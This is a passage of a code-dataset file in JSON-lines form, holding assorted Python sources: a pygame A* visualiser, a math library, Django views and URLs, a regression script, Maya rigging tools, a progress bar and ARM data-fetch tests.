False\r\n\r\n\r\ndef make_grid(rows, width):\r\n\tgrid = []\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\tgrid.append([])\r\n\t\tfor j in range(rows):\r\n\t\t\tmark = Mark(i, j, gap, rows)\r\n\t\t\tgrid[i].append(mark)\r\n\r\n\treturn grid\r\n\r\n\r\ndef draw_grid(win, rows, width):\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\tpygame.draw.line(win, GREY, (0, i * gap), (width, i * gap))\r\n\t\tfor j in range(rows):\r\n\t\t\tpygame.draw.line(win, GREY, (j * gap, 0), (j * gap, width))\r\n\r\n\r\ndef draw(win, grid, rows, width):\r\n\twin.fill(WHITE)\r\n\r\n\tfor row in grid:\r\n\t\tfor mark in row:\r\n\t\t\tmark.draw(win)\r\n\r\n\tdraw_grid(win, rows, width)\r\n\tpygame.display.update()\r\n\r\n\r\ndef get_clicked_pos(pos, rows, width):\r\n\tgap = width // rows\r\n\ty, x = pos\r\n\r\n\trow = y // gap\r\n\tcol = x // gap\r\n\r\n\treturn row, col\r\n\r\n\r\ndef main(win, width):\r\n\tROWS = 50\r\n\tgrid = make_grid(ROWS, width)\r\n\r\n\tstart = None\r\n\tend = None\r\n\r\n\trun = True\r\n\twhile run:\r\n\t\tdraw(win, grid, ROWS, width)\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\trun = False\r\n\r\n\t\t\tif pygame.mouse.get_pressed()[0]: \r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\tmark = grid[row][col]\r\n\t\t\t\tif not start and mark != end:\r\n\t\t\t\t\tstart = mark\r\n\t\t\t\t\tstart.make_start()\r\n\r\n\t\t\t\telif not end and mark != start:\r\n\t\t\t\t\tend = mark\r\n\t\t\t\t\tend.make_end()\r\n\r\n\t\t\t\telif mark != end and mark != start:\r\n\t\t\t\t\tmark.make_barrier()\r\n\r\n\t\t\telif pygame.mouse.get_pressed()[2]:\r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\tmark = grid[row][col]\r\n\t\t\t\tmark.reset()\r\n\t\t\t\tif mark == start:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\telif mark == end:\r\n\t\t\t\t\tend = None\r\n\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\tif event.key == pygame.K_SPACE and start and end:\r\n\t\t\t\t\tfor row in grid:\r\n\t\t\t\t\t\tfor mark in row:\r\n\t\t\t\t\t\t\tmark.update_neighbors(grid)\r\n\r\n\t\t\t\t\talgorithm(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\r\n\t\t\t\tif event.key == pygame.K_c:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\t\tend = None\r\n\t\t\t\t\tgrid = make_grid(ROWS, width)\r\n\r\n\tpygame.quit()\r\n\r\nmain(WIN, 
WIDTH)\r\n","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"511181402","text":"# Math operations library\nfrom collections import namedtuple\nimport numpy as np\n\nV3 = namedtuple('Point3', ['x', 'y', 'z'])\nV4 = namedtuple('Point4', ['x', 'y', 'z', 'w'])\n\n# Subtraction of 2 vectors\ndef subtract(v1, v2):\n    result = []\n\n    if isinstance(v1, (float, int)):\n        for i in range(len(v2)):\n            result.append(v1 - v2[i])\n    elif isinstance(v2, (float, int)):\n        for i in range(len(v1)):\n            result.append(v1[i] - v2)\n    elif len(v1) == len(v2):\n        for i in range(len(v1)):\n            result.append(v1[i] - v2[i])\n    else:\n        return\n\n    return result\n\n# Addition of 2 vectors\ndef sum(v1, v2):\n    result = []\n\n    if isinstance(v1, (float, int)):\n        for i in range(len(v2)):\n            result.append(v1 + v2[i])\n    elif isinstance(v2, (float, int)):\n        for i in range(len(v1)):\n            result.append(v1[i] + v2)\n    elif len(v1) == len(v2):\n        for i in range(len(v1)):\n            result.append(v1[i] + v2[i])\n    else:\n        return\n\n    return result\n\n# Multiplication of 2 vectors\ndef multiply(a, b):\n    result = []\n\n    if isinstance(a, (float, int)):\n        for i in range(len(b)):\n            result.append(a * b[i])\n    elif len(a) == len(b):\n        for i in range(len(a)):\n            result.append(a[i] * b[i])\n    else:\n        return\n\n    return result\n\ndef divide(a, b):\n    result = []\n\n    if isinstance(a, (float, int)):\n        for i in range(len(b)):\n            result.append(a / b[i])\n    elif len(a) == len(b):\n        for i in range(len(a)):\n            result.append(a[i] / b[i])\n    else:\n        return\n\n    return result\n\n\n# Cross product of 2 vectors\ndef cross(a, b):\n    result = []\n\n    if len(a) == 2 and len(b) == 2:\n        result.append((a[0] * b[1]) - (a[1] * b[0]))\n        return result[0]\n    else:\n        result.append((a[1] * b[2]) - (a[2] * b[1]))\n        result.append((a[2] * b[0]) - (a[0] * b[2]))\n        result.append((a[0] * b[1]) - (a[1] * b[0]))\n\n    return result\n\n# Dot product of 2 vectors\ndef dot(a, b):\n    result = []\n    dot_result = 0\n\n    if isinstance(a, (float, int)):\n        for i in range(len(b)):\n            result.append(a * b[i])\n        return result\n    elif len(a) == len(b):\n        for i in range(len(a)):\n            result.append(a[i] * b[i])\n        for r in result:\n            dot_result += r\n        return dot_result\n    else:\n        return\n\n\ndef hypotenuse(v):\n    r = 0\n    for a in v:\n        r += pow(a, 2)\n\n    r = pow(r, 0.5)\n\n    return r\n\n\n# Normalizes a vector\ndef normalize(v):\n    result = []\n    r = 0\n    for a in v:\n        r += pow(a, 2)\n\n    r = pow(r, 0.5)\n\n    if r != 0:\n        for a in v:\n            result.append(a / r)\n    else:\n        return v\n\n    return result\n\n# Approximate value of pi\ndef pi():\n    return 3.1415926535897932384626433\n\n# Converts degrees to radians\ndef deg2rad(deg):\n    return (deg * pi()) / 180\n\nclass Matrix(object):\n    def __init__(self, matrix):\n        self.matrix = matrix\n        self.rows = len(matrix)\n        self.cols = len(matrix[0])\n\n    def __len__(self):\n        return len(self.matrix)\n\n    # Multiplication matrix * matrix or matrix * vector\n    def __matmul__(self, other):\n\n        # Checks whether the second argument is a matrix\n        if isinstance(other, Matrix):\n            c = Matrix([[0 for x in range(other.cols)] for y in range(self.rows)])\n\n            if self.cols != other.rows:\n                raise ValueError('The number of columns (first matrix), and rows (second matrix) must coincide')\n\n            for y in range(self.rows):\n                for a in range(other.cols):\n                    x = 0\n                    for b in range(other.rows):\n                        x += self.matrix[y][b] * other.matrix[b][a]\n                    c.matrix[y][a] = x\n\n        # Checks whether the second argument is a vector\n        # TODO: fix this validation so it checks for a V3 or V4 instance\n        else:\n            c = Matrix([[0 for x in range(self.rows)] for y in range(1)])\n            rows = len(other)\n            if self.cols != rows:\n                raise ValueError('The number of columns of the matrix, and the size of the vector must coincide')\n            for y in range(self.rows):\n                x = 0\n                for a in range(rows):\n                    x += self.matrix[y][a] * other[a]\n                c.matrix[0][y] = x\n\n        return c\n\n    # Removes a row or column from a matrix\n    def delete(self, obj, axis=None):\n        # Removes a column\n        result = []\n        if axis == 1:\n            for y in self.matrix:\n                fila = []\n                for x in range(len(y)):\n                    if x != obj:\n                        fila.append(y[x])\n                result.append(fila)\n        # Removes a row\n        else:\n            cont = 0\n            for fila in self.matrix:\n                if cont != obj:\n                    result.append(fila)\n                cont += 1\n\n        return result\n\n    # Computes the determinant of a matrix\n    def det(self):\n        if self.cols != self.rows:\n            raise ValueError('The number of columns and rows must coincide')\n\n        determinant = 0\n        # Checks that the matrix dimension is greater than 2\n        if self.rows != 2:\n            cols = []\n            rows = []\n            # Looks for rows and columns with 0\n            for y in range(self.rows):\n                fila = 0\n                col = 0\n                for x in range(self.cols):\n                    if self.matrix[y][x] == 0:\n                        fila += 1\n                    if self.matrix[x][y] == 0:\n                        col += 1\n                rows.append(fila)\n                cols.append(col)\n\n            # Evaluates the rows and columns to use the one with the most 0's\n            col = max(cols)\n            row = max(rows)\n\n            # When there are more 0's in the columns\n            if col > row:\n                x = cols.index(col)\n                determinant = 0\n                for y in range(self.rows):\n                    det = 0\n                    if self.matrix[y][x] != 0:\n                        matrix = Matrix(self.delete(x, 1))\n                        a_matrix = Matrix(matrix.delete(y))\n                        value = pow(-1, (y + x)) * self.matrix[y][x]\n                        if a_matrix.rows == 3:\n                            det = value * a_matrix.det()\n                        if a_matrix.rows == 2:\n                            adjunto = (a_matrix.matrix[0][0] * a_matrix.matrix[1][1]) - \\\n                                      (a_matrix.matrix[0][1] * a_matrix.matrix[1][0])\n                            det = value * adjunto\n                    determinant += det\n            # When there are more 0's in the rows or both have the same number of 0's\n            else:\n                y = rows.index(row)\n                determinant = 0\n                for x in range(self.rows):\n                    det = 0\n                    if self.matrix[y][x] != 0:\n                        matrix = Matrix(self.delete(x, 1))\n                        a_matrix = Matrix(matrix.delete(y))\n                        value = pow(-1, (y + x)) * self.matrix[y][x]\n                        if a_matrix.rows == 3:\n                            det = value * a_matrix.det()\n                        if a_matrix.rows == 2:\n                            adjunto = (a_matrix.matrix[0][0] * a_matrix.matrix[1][1]) - \\\n                                      (a_matrix.matrix[0][1] * a_matrix.matrix[1][0])\n                            det = value * adjunto\n                    determinant += det\n        # When the matrix dimension equals 2\n        elif self.rows == 2:\n            determinant = (self.matrix[0][0] * self.matrix[1][1]) - \\\n                          (self.matrix[0][1] * self.matrix[1][0])\n\n        return determinant\n\n    # Finds the adjugate matrix\n    def adjunctMatrix(self):\n        result = Matrix([[0 for x in range(self.cols)] for y in range(self.rows)])\n\n        for y in range(self.rows):\n            for x in range(self.cols):\n                matrix = Matrix(self.delete(x, 1))\n                a_matrix = Matrix(matrix.delete(y))\n                result.matrix[y][x] = pow(-1, (y + x)) * a_matrix.det()\n\n        return result.matrix\n\n    # Finds the transposed matrix\n    def transpose(self):\n        result = Matrix([[0 for x in range(self.cols)] for y in range(self.rows)])\n        for y in range(self.rows):\n            for x in range(self.cols):\n                result.matrix[x][y] = self.matrix[y][x]\n        return result\n\n    # Finds the inverse of a matrix\n    def inv(self):\n        result = Matrix([[0 for x in range(self.cols)] for y in range(self.rows)])\n        adj = self.transpose().adjunctMatrix()\n        det = self.det()\n        for y in range(self.rows):\n            
for x in range(self.cols):\n                result.matrix[y][x] = adj[y][x] / det\n\n        return result\n\n","sub_path":"libs/zmath.py","file_name":"zmath.py","file_ext":"py","file_size_in_byte":8994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"250869612","text":"from django.shortcuts import render, render_to_response, get_object_or_404\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic import ListView,DetailView\nfrom django.utils import timezone\nfrom books.models import Book, Author, Publisher\n\n\n# Create your views here.\n\n\ndef display_meta(request):\n    values = request.META.items()\n    # values.sort()\n    return render_to_response('display_meta.html', locals())\n\n# def search_form(request):\n#     return render_to_response('search_form.html')\n\n\ndef search(request):\n    errors = []\n    if 'q' in request.GET:\n        q = request.GET['q']\n        if not q:\n            errors.append('Enter a search term.')\n        elif len(q) > 20:\n            errors.append('Please enter at most 20 characters.')\n        else:\n            books = Book.objects.filter(title__icontains=q)\n            return render_to_response('search_results.html',\n                {'books': books, 'query': q})\n    return render_to_response('search_form.html', {'error': errors})\n\n\nclass PublisherList(ListView):\n    model = Publisher\n\n\nclass PublisherBookList(ListView):\n    template_name = \"books/books_by_publisher.html\"\n\n    def get_queryset(self):\n        self.publisher = get_object_or_404(Publisher, name=self.args[0])\n        return Book.objects.filter(publisher=self.publisher)\n\n    def get_context_data(self, **kwargs):\n        print(\"self.args[0]=\", self.args[0])\n        context = super(PublisherBookList, self).get_context_data(**kwargs)\n        context['publisher'] = self.publisher\n        return context\n\nclass AuthorDetailView(DetailView):\n    queryset = Author.objects.all()\n    def get_object(self):\n        mobject = super(AuthorDetailView, self).get_object()\n        mobject.last_accessed = timezone.now()\n        mobject.save()\n        return mobject\n\n    def get_context_data(self, *args, **kwargs):\n        context=super(AuthorDetailView,self).get_context_data(*args,**kwargs)\n        mm_object=get_object_or_404(Author,id=self.kwargs['pk'])\n        m_object = super(AuthorDetailView,self).get_object()\n        context['author']=m_object\n        print(context) \n        return context","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"525636625","text":"from sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import train_test_split\n\n#importing the data set\nwh = pd.read_csv('weatherHistory.csv')\n\n#searching for attributes which have null values\nprint(wh[\"Precip Type\"].isnull().any())\n\n#finding the correlation for better training of the model by selecting the appropriate features\nprint(wh.corr())\n\n#dropping the columns since they have less correlation with target class\nwh = wh.drop(columns=['Summary','Precip Type','Daily Summary' ],axis=1)\n\n#keep the numeric columns and fill the missing values by interpolation\nwh = wh.select_dtypes(include=[np.number]).interpolate().dropna()\n\n\nX_train, X_test = train_test_split(wh, test_size=0.2)\ny_train=X_train['Temperature (C)']\n\nX_train=X_train.drop(columns=['Temperature (C)'])\ny_test=X_test['Temperature (C)']\nX_test=X_test.drop(columns=['Temperature (C)'])\n\n\n\n#creation of regression model and 
training it\nreg=LinearRegression().fit(X_train,y_train)\n\n\npred=reg.predict(X_test)\n\n#evaluation of model using metrics\nmean_squared_error = mean_squared_error(y_test, pred)\nr2_score = r2_score(y_test,pred)\nprint(\"mean squared error is :\",mean_squared_error)\nprint(\"r2_score is: \", r2_score)\n","sub_path":"ICP 6/Source/icp6_2.py","file_name":"icp6_2.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"545789213","text":"import os\n\nfrom uitools.qproxy import Q\n\nfrom .exporter import Exporter\n\n\nsettings = {}\n\ndef __before_reload__():\n return settings\n\ndef __after_reload__(state):\n settings.update(state)\n\n\ndef run():\n dialog = Dialog()\n dialog.exec_()\n\n\nclass Dialog(Q.Dialog):\n\n def __init__(self):\n super(Dialog, self).__init__()\n\n self.layout = Q.FormLayout()\n self.setLayout(self.layout)\n\n self.path_layout = Q.HBoxLayout()\n self.layout.addRow(\"Path\", self.path_layout)\n\n self.path_lineedit = Q.LineEdit()\n self.path_lineedit.setMinimumWidth(600)\n self.path_lineedit.setText(settings.get('path') or os.path.expanduser('~/Desktop'))\n self.path_layout.addWidget(self.path_lineedit)\n\n self.path_button = Q.PushButton('Select')\n self.path_layout.addWidget(self.path_button)\n self.path_button.clicked.connect(self.on_path_button)\n\n self.type_combobox = Q.ComboBox()\n self.type_combobox.addItems(['jpg', 'tif', 'png', 'exr'])\n index = self.type_combobox.findText(settings.get('ext', 'jpg'))\n self.type_combobox.setCurrentIndex(index);\n self.layout.addRow(\"Type\", self.type_combobox)\n\n self.export_images_checkbox = Q.CheckBox('Export Images', checked=settings.get('export_images', True))\n self.layout.addRow(\"\", self.export_images_checkbox)\n\n button_layout = Q.HBoxLayout()\n self.layout.addRow(\"\", button_layout)\n self.export_button = Q.PushButton('Export')\n button_layout.addWidget(self.export_button)\n self.export_button.clicked.connect(self.on_export_button)\n\n def on_path_button(self, *args):\n path = Q.FileDialog.getExistingDirectory(\n caption='Select export directory',\n dir=self.path_lineedit.text(),\n )\n if path:\n self.path_lineedit.setText(path)\n\n def on_export_button(self, *args):\n\n settings.clear()\n settings['path'] = self.path_lineedit.text()\n settings['export_images'] = self.export_images_checkbox.isChecked()\n settings['ext'] = self.type_combobox.currentText()\n\n Exporter(**settings).run()\n\n self.hide()\n\n\n\n\n","sub_path":"sitg/mari/exporterui.py","file_name":"exporterui.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278984","text":"#[----------------------] 0%\n#[############----------] 50%\n#[######################] 100%\n# Model\n# - progress\n# - setProgress()\n# View\n# - display()\n# Controller\n# - init\nimport os\n\nclass ProgressModel:\n\tdef __init__(self):\n\t\tself.progress = 0\n\t\t# Complete event callback function\n\t\tself.complete = lambda:x\n\n\tdef icrement(self):\n\t\tif self.progress < 100:\n\t\t\tself.progress += 1\n\t\telse:\n\t\t\tself.complete()\n\nclass ProgressView:\n\tdef clearScreen(self):\n\t\tos.system('cls' if os.name == 'nt' else 'clear')\n\n\tdef display(self,progress):\n\t\tself.clearScreen()\n\t\ttoDisplay = '['\n\t\tfor i in range(50):\n\t\t\tif i < progress//2:\n\t\t\t\ttoDisplay += '#'\n\t\t\telse:\n\t\t\t\ttoDisplay += '-'\n\t\ttoDisplay += '] ' + str(progress) + 
'%'\n\t\tprint(toDisplay)\n\n\tdef showComplete(self):\n\t\tprint('YAY, We are done')\n\nclass ProgressController:\n\tdef __init__(self):\n\t\tself.running = True\n\t\tself.model = ProgressModel()\n\t\tself.view = ProgressView()\n\t\tself.view.clearScreen()\n\t\tself.model.complete = self.complete\n\t\tself.loop()\n\n\tdef complete(self):\n\t\tself.view.showComplete()\n\t\tself.running = False\n\n\tdef loop(self):\n\t\twhile self.running:\n\t\t\tinput()\n\t\t\tself.model.icrement()\n\t\t\tself.view.display( self.model.progress )\n\n\t\tself.view.showComplete()\n\nprogressBar = ProgressController()\n","sub_path":"week-06/Tibi_progress_bar.py","file_name":"Tibi_progress_bar.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299538320","text":"# write a function that takes a filename and returns the number of lines the\n# file consists. It should return zero if the file not exists.\n\ndef countLines():\n text = input(\"Which file's lines would you like to count?\")\n count = len(open(text).readlines( ))\n return count\n\nwhile True:\n try:\n print(countLines())\n break\n except IOError:\n print(\"zero\")\n\ncountLines()\n","sub_path":"week-05/day-3/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209751758","text":"\"Module for creating Clavical Rig\"\r\n\r\nimport maya.cmds as mc\r\nfrom RangleRig.toolkit import controlGen\r\nfrom RangleRig.toolkit import assetColourer\r\nfrom RangleRig.toolkit import attrLocker\r\nfrom RangleRig.toolkit import objDefine\r\nfrom RangleRig.toolkit import setDvrKey\r\nfrom RangleRig.toolkit import selectHirearchy\r\n\r\nclass clavGen():\r\n \r\n def __init__(self, basejoint,characterName,rigGrp,visGrp):\r\n \r\n self.setupJnt = basejoint\r\n baseJntslst = selectHirearchy.jntHirearch(basejoint,False)\r\n endSetup = baseJntslst[0]\r\n \r\n ID = mc.getAttr(basejoint +'.UniqueID')\r\n \r\n rigJnts = mc.duplicate(basejoint, name = ID+'_01_Jnt', renameChildren = True)\r\n jnt1 = mc.rename(rigJnts[0], ID + '_01_Jnt')\r\n jnt2 = mc.rename(rigJnts[1], ID + '_02_Jnt')\r\n \r\n #Clavicle Set Up\r\n locX = mc.getAttr(jnt1 + \".translateX\")\r\n\r\n if locX > 0:\r\n assetCol = 6\r\n prefix = \"L_\"\r\n \r\n elif locX < 0:\r\n prefix = \"R_\"\r\n assetCol = 13\r\n \r\n else:\r\n assetCol = 22\r\n prefix = \"M_\"\r\n \r\n mc.setAttr(jnt1 + '.setUpJnt', lock= False)\r\n mc.setAttr(jnt1 + '.UniqueID', lock= False)\r\n mc.setAttr(jnt1 + '.Connect_to', lock= False)\r\n mc.setAttr(jnt1 + '.Connection_type', lock= False)\r\n mc.setAttr(jnt1 + '.characterName', lock= False)\r\n mc.deleteAttr(jnt1 + '.setUpJnt')\r\n mc.deleteAttr(jnt1 + '.characterName')\r\n mc.deleteAttr(jnt1 + '.UniqueID')\r\n mc.deleteAttr(jnt1 + '.Connect_to')\r\n mc.deleteAttr(jnt1 + '.Connection_type')\r\n \r\n clavJnts = mc.listRelatives(jnt1)\r\n baseJnt = mc.rename(jnt1 , prefix +'clavBase_jnt') \r\n self.childJnt = mc.rename(clavJnts[0], prefix +'clavBase_end')\r\n \r\n \r\n \r\n #Create Clavicle Ik\r\n clavIk = mc.ikHandle(startJoint = baseJnt, \r\n endEffector = self.childJnt,\r\n name = prefix +'clavicle_ikhandle')\r\n \r\n \r\n \r\n\r\n \r\n \r\n '''\r\n #ADVANCE CLAVS (WIP)\r\n \r\n mc.distanceDimension( startPoint =[-1,0,0] , endPoint = [1,0,0])\r\n\r\n baseLoc = 'locator1'\r\n childLoc = 'locator2'\r\n \r\n baseLoc = mc.rename(baseLoc, '%sbaseClav_loc' %prefix)\r\n childLoc 
= mc.rename(childLoc, '%sendClav_loc' %prefix)\r\n \r\n mc.parent(baseLoc, baseJnt)\r\n mc.parent(childLoc, clavIk[0])\r\n \r\n mc.move(0,0,0, baseLoc, objectSpace = True)\r\n mc.move(0,0,0, childLoc, objectSpace = True)\r\n \r\n mc.rename('distanceDimension1', prefix +'clavDist_util')\r\n clavDist = prefix + \"clavDist_utilShape\"\r\n '''\r\n\r\n \r\n #Create Clavicle Controls\r\n self.clavCtrl= controlGen.generateSquare(prefix + \"clavicle_anim\", clavIk[0] ,False)\r\n assetColourer.colourer([self.clavCtrl], assetCol)\r\n \r\n\r\n \r\n #Constrain Ik handle to controler\r\n mc.parent(clavIk[0],self.clavCtrl) \r\n \r\n #Grouping\r\n self.clavGrp = mc.group(empty = True, name = prefix + \"Clav_grp\")\r\n dntGroup= mc.group(empty = True, name = prefix + \"DONOTTOUCH_Clav_grp\")\r\n mc.parent(dntGroup, self.clavGrp)\r\n mc.parent(baseJnt,dntGroup)\r\n mc.parent(self.clavCtrl, self.clavGrp)\r\n \r\n \r\n #Clean Up (Non Joint)\r\n attrLocker.lockCommon(dntGroup,['X','Y','Z'], ['X','Y','Z'], ['X','Y','Z'], True, True)\r\n mc.setAttr(clavIk[0] + '.visibility', 0)\r\n attrLocker.lockCommon(self.clavCtrl,[], [], ['X','Y','Z'], False, True)\r\n \r\n #Clean Up (Joints)\r\n mc.setAttr(self.childJnt +'.drawStyle', 2)\r\n mc.setAttr(baseJnt +'.drawStyle', 2)\r\n \r\n #Clav Vis\r\n mc.select(visGrp)\r\n mc.addAttr( shortName=ID + '_ClavVis', longName=ID + '_ClavVis', attributeType = 'enum', enumName = 'On:Off' , keyable = True, hidden = False )\r\n \r\n for i in [self.clavCtrl]:\r\n setDvrKey.setDvrK(visGrp + '.' + ID + '_ClavVis', i + '.visibility', 0, 1)\r\n setDvrKey.setDvrK(visGrp + '.' + ID + '_ClavVis', i + '.visibility', 1, 0)\r\n\r\n attrLocker.lockCommon(i,[],[],[],True,True)\r\n \r\n \r\n \r\n #Define Controls\r\n objDefine.definer('characterName', [self.clavCtrl], characterName)\r\n objDefine.definer('controlArea', [self.clavCtrl], prefix + \"clav\")\r\n objDefine.definer(\"Connection\", [self.clavGrp], \"root\")\r\n objDefine.definer(\"Connection\", [self.clavCtrl], endSetup )\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n ","sub_path":"RangleRig/rigModules/clavicleRig.py","file_name":"clavicleRig.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267397405","text":"import inspect\nimport os\n\n\nfrom netCDF4 import Dataset\nimport pandas as pd\nimport pytest\n\n\nfrom solarforecastarbiter.io.fetch import arm\n\n\nTEST_DATA_DIR = os.path.dirname(\n os.path.abspath(inspect.getfile(inspect.currentframe())))\nMET_FILE = os.path.join(TEST_DATA_DIR, 'data',\n 'sgpmetE13.b1.20190122.000000.cdf')\nIRRAD_FILE = os.path.join(TEST_DATA_DIR, 'data',\n 'sgpqcrad1longC1.c1.20190122.000000.cdf')\n\n\ntest_datastreams = ['ds_1', 'ds_2']\nstart_date = pd.Timestamp('2019-01-22')\nend_date = pd.Timestamp('2019-01-23')\n\n\ndef filenames(*args):\n if args[2] == 'ds_1':\n return ['irrad']\n if args[2] == 'ds_2':\n return ['weather']\n return []\n\n\ndef request_file(*args):\n if args[2] == 'irrad':\n return Dataset(IRRAD_FILE)\n if args[2] == 'weather':\n return Dataset(MET_FILE)\n\n\ndef test_format_date():\n date = pd.Timestamp('2019-01-23T01:01:01Z')\n assert arm.format_date(date) == '2019-01-23'\n\n\ndef mocked_request_get_files(*args, **kwargs):\n class Object:\n pass\n response = Object()\n response.text = '{\"files\": [\"filename1\", \"filename2\"]}'\n return response\n\n\n@pytest.fixture\ndef api_key():\n return 'bogus_key'\n\n\n@pytest.fixture\ndef user_id():\n return 
'user_id'\n\n\n@pytest.mark.parametrize('stream,variables,start,end', [\n (test_datastreams[0], ['down_short_hemisp',\n 'not_real'], start_date, end_date),\n (test_datastreams[1], ['temp_mean'], start_date,\n end_date),\n])\ndef test_fetch_arm(user_id, api_key, stream, variables, start, end, mocker):\n mocker.patch('solarforecastarbiter.io.fetch.arm.list_arm_filenames',\n side_effect=filenames)\n mocker.patch('solarforecastarbiter.io.fetch.arm.retrieve_arm_dataset',\n side_effect=request_file)\n data = arm.fetch_arm(user_id, api_key, stream, variables, start, end)\n assert variables[0] in data.columns\n\n\n@pytest.mark.parametrize('stream,start,end', [\n ('datastream', start_date, end_date)\n])\ndef test_request_file_lists(user_id, api_key, stream, start, end, mocker):\n mocked_get = mocker.patch('solarforecastarbiter.io.fetch.arm.requests.get',\n side_effect=mocked_request_get_files)\n arm.list_arm_filenames(user_id, api_key, stream, start, end)\n mocked_get.assert_called_with(\n 'https://adc.arm.gov/armlive/data/query',\n params={\n 'user': f'{user_id}:{api_key}',\n 'ds': 'datastream',\n 'start': '2019-01-22',\n 'end': '2019-01-23',\n 'wt': 'json'\n })\n\n\ndef test_request_arm_file(user_id, api_key, mocker):\n mocked_get = mocker.patch('solarforecastarbiter.io.fetch.arm.requests.get')\n arm.request_arm_file(user_id, api_key, 'sgpqcrad1longC1.c1.cdf')\n mocked_get.assert_called_with(\n arm.ARM_FILES_DOWNLOAD_URL,\n params={\n 'user': f'{user_id}:{api_key}',\n 'file': 'sgpqcrad1longC1.c1.cdf',\n },\n stream=True)\n\n\ndef test_extract_arm_variables_exist(mocker):\n nc_file = request_file(None, None, 'irrad')\n extracted = arm.extract_arm_variables(nc_file,\n ['down_short_hemisp', 'nonexistent'])\n assert 'down_short_hemisp' in extracted.columns\n assert 'non-existent' not in extracted.columns\n\n\ndef test_extracted_arm_variables_empty(mocker):\n nc_file = request_file(None, None, 'irrad')\n extracted = arm.extract_arm_variables(nc_file,\n ['no', 'nein', 'ie', 'non'])\n assert extracted.empty\n\n\ndef test_no_files(user_id, api_key, mocker):\n mocker.patch('solarforecastarbiter.io.fetch.arm.list_arm_filenames',\n side_effect=filenames)\n mocker.patch('solarforecastarbiter.io.fetch.arm.retrieve_arm_dataset',\n side_effect=request_file)\n start = end = pd.Timestamp.now()+pd.Timedelta('1 days')\n arm_df = arm.fetch_arm(user_id, api_key, 'ds_no_files',\n ['down_short_hemisp'], start, end)\n assert arm_df.empty\n","sub_path":"solarforecastarbiter/io/fetch/tests/test_arm.py","file_name":"test_arm.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209378656","text":"from django.conf.urls import url\nfrom users import views\n\n\nurlpatterns = [\n\n # 注册\n url(r'^user_register/$', views.user_register, name='user_register'),\n # 登陆\n url(r'^user_login/$', views.user_login, name='user_login'),\n # 退出\n url(r'^user_logout/$', views.user_logout, name='user_logout'),\n # 注册账号激活\n url(r'^user_active/(\\w+)$', views.user_active, name='user_active'),\n # 重置密码邮件验证码\n url(r'^user_forget/$', views.user_forget, name='user_forget'),\n # 重置密码\n url(r'^user_reset/(\\w+)$', views.user_reset, name='user_reset'),\n\n # 个人用户中心-个人资料\n url(r'^user_info/$', views.user_info, name='user_info'),\n # 个人用户中心-个人资料-修改用户头像\n url(r'^user_changeimage/$', views.user_changeimage, name='user_changeimage'),\n # 个人用户中心-个人资料-修改用户信息\n url(r'^user_changeinfo/$', views.user_changeinfo, name='user_changeinfo'),\n # 个人用户中心-个人资料-修改用户邮箱-发送验证码\n 
url(r'^user_changeemail/$', views.user_changeemail, name='user_changeemail'),\n # 个人用户中心-个人资料-修改用户邮箱-完成\n url(r'^user_resetemail/$', views.user_resetemail, name='user_resetemail'),\n # 个人用户中心-我的课程\n url(r'^user_course/$', views.user_course, name='user_course'),\n # 个人用户中心-我的收藏(机构1)\n url(r'^user_loveorg/$', views.user_loveorg, name='user_loveorg'),\n # 个人用户中心-我的收藏(讲师3)\n url(r'^user_loveteacher/$', views.user_loveteacher, name='user_loveteacher'),\n # 个人用户中心-我的收藏(课程2)\n url(r'^user_lovecourse/$', views.user_lovecourse, name='user_lovecourse'),\n # 个人用户中心-我的消息\n url(r'^user_message/$', views.user_message, name='user_message'),\n # 个人用户中心-我的消息-未读消息变成已读消息\n url(r'^user_deletemessage/$', views.user_deletemessage, name='user_deletemessage'),\n\n]\n","sub_path":"apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"306096920","text":"from src.common.handler import AdminHandler\nimport src.datastore.action as datastore\n\nimport json\n\nclass RegisterApplication(AdminHandler):\n\n def post(self):\n response_data = {\"status\": 200, \"error\": \"\"}\n data = json.loads(self.request.body)\n\n isValid = self.validate(response_data, data)\n if isValid:\n is_actv = True if \"is_actv\" not in data else 